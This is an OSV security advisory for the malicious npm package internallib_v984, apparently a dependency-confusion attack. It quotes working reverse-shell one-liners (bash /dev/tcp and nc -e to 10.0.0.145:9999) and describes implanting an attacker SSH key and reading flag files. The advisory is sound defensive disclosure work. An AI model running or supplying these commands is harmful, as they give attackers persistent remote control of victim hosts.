MAL-2026-5695
See a problem?- Import Source
- https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/internallib_v984/MAL-2026-5695.json
- JSON Data
- https://api.osv.dev/v1/vulns/MAL-2026-5695
- Published
- 2026-06-12T15:28:17Z
- Modified
- 2026-06-12T16:46:41.561188154Z
- Summary
- Malicious code in internallib_v984 (npm)
- Details
-
-= Per source details. Do not edit below this line.=-
Source: amazon-inspector (3c46879ad94169111411f91b210779628bb14a5d16843ec2bec42bf418affdf8)
Package exports a single
command()function that, when invoked, performs three coordinated attacks against the host: (1) appends a hardcoded attacker-controlled SSH public key (tr0n@DESKTOP-GVIA2J0) toauthorized_keysunder/root/.ssh,/home/gitlab-runner/.ssh, and/home/internal/.ssh, granting persistent remote root and CI-runner login; (2) reads/root/root.txt,/home/internal/user.txt, and/home/gitlab-runner/user.txtand writes their contents to stdout; (3) opens a reverse shell to10.0.0.145:9999using three redundant methods (bash -i >& /dev/tcp/10.0.0.145/9999 0>&1,nc -e /bin/bash 10.0.0.145 9999, and a Nodenet.Socketconnecting to the same address withspawn('/bin/bash')). The package has no README, no author or repository metadata, and the nameinternallib_v984is shaped to win a dependency-confusion resolution against an internal library of that name. There is no legitimate functionality — the entire module is offensive tooling. Any consumer that resolves this package from the public registry and calls its export is fully compromised: persistent SSH access via the implanted key, live interactive C2 via the reverse shell, and exfiltration of CTF-style flag files. The hardcoded RFC1918 destination (10.0.0.145) further indicates the attacker expects to land inside a corporate or lab network where that address is routable. - Database specific
{ "malicious-packages-origins": [ { "id": "IN-MAL-2026-005784", "versions": [ "1.0.2" ], "sha256": "093b5433386d2468e78e9896d1c8566d06f6f3ac6544dc90d4e6fdb9d967c6ed", "source": "amazon-inspector", "modified_time": "2026-06-12T15:28:18Z", "import_time": "2026-06-12T16:32:16.195323356Z" }, { "id": "IN-MAL-2026-005786", "versions": [ "1.0.3" ], "sha256": "3c46879ad94169111411f91b210779628bb14a5d16843ec2bec42bf418affdf8", "source": "amazon-inspector", "modified_time": "2026-06-12T15:28:20Z", "import_time": "2026-06-12T16:32:16.316167869Z" }, { "id": "IN-MAL-2026-005783", "import_time": "2026-06-12T16:32:16.096173613Z", "sha256": "5910f34f83567d2d5f48fc2c3966537cc4b313570d77696c743d116fc2b54f05", "source": "amazon-inspector", "modified_time": "2026-06-12T15:28:18Z", "versions": [ "1.0.4" ] }, { "id": "IN-MAL-2026-005785", "versions": [ "99.0.0" ], "sha256": "7e1e3c1f3e148527111254b20a9cbe8d1a6f5d6abaadc0e45c35ca4b2febc431", "source": "amazon-inspector", "modified_time": "2026-06-12T15:28:19Z", "import_time": "2026-06-12T16:32:16.257323353Z" }, { "id": "IN-MAL-2026-005782", "versions": [ "1.0.5" ], "sha256": "af6c7b94d4d81140d1e4d37ddf38ef298287d7e118ac0849311254c88ebb8916", "source": "amazon-inspector", "modified_time": "2026-06-12T15:28:17Z", "import_time": "2026-06-12T16:32:16.039312325Z" }, { "id": "IN-MAL-2026-005787", "versions": [ "1.0.1" ], "sha256": "b62a6df4be478a792579b9f9741361e56e14fdd0d96f97305bf1fd4a0f076a06", "source": "amazon-inspector", "modified_time": "2026-06-12T15:28:21Z", "import_time": "2026-06-12T16:32:16.35801051Z" } ] }- References
-
- https://www.npmjs.com/package/internallib_v984/v/1.0.2
- https://www.npmjs.com/package/internallib_v984/v/1.0.3
- https://www.npmjs.com/package/internallib_v984/v/1.0.4
- https://www.npmjs.com/package/internallib_v984/v/99.0.0
- https://www.npmjs.com/package/internallib_v984/v/1.0.5
- https://www.npmjs.com/package/internallib_v984/v/1.0.1
- Credits
-
-
- Amazon Inspector - FINDER
-
Affected packages
npm / internallib_v984
Package
- Name
- internallib_v984
- View open source insights on deps.dev
- Purl
- pkg:npm/internallib_v984
Database specific
indicators
{
"evidence_files": [
{
"path": "index.js",
"sha256": "c56e66a9a2949458b1ff04c051c756d7da43c20d8d7de439f5902becdb704360",
"tlsh": "bb21001014f2223d1a3311a6eb17b067322388136229db517acc831a0f89e9c57ef3d4"
},
{
"path": "package.json",
"sha256": "4efa558a27a2536419deb72dd9e9e73c9a541ca938a3b0a6e8e3376604db6ccb",
"tlsh": "5fc092b149266d3760d547b41db1890a36a68d3f9406b4485b232a0c80efef368f930c"
}
],
"package_integrity": [
{
"filename": "internallib_v984-1.0.2.tgz",
"hashes": {
"sha512_sri": "sha512-nLD1bGfeZmQk66wo48E0yMss13QtTa/lSunlSs5nyzYLJy9cU92yB1yqWeVbG3W29H9aq4JUn9SBQq7e5VnPGw==",
"sha1": "e03ded23d8cae7cc88ab9c723cf5cb688f8669fe"
}
}
]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/internallib_v984/MAL-2026-5695.json"
cwes
[
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
},
{
"cweId": "CWE-506",
"name": "Embedded Malicious Code",
"description": "The product contains code that appears to be malicious in nature."
},
{
"cweId": "CWE-506",
"name": "Embedded Malicious Code",
"description": "The product contains code that appears to be malicious in nature."
},
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
},
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
},
{
"cweId": "CWE-506",
"name": "Embedded Malicious Code",
"description": "The product contains code that appears to be malicious in nature."
}
]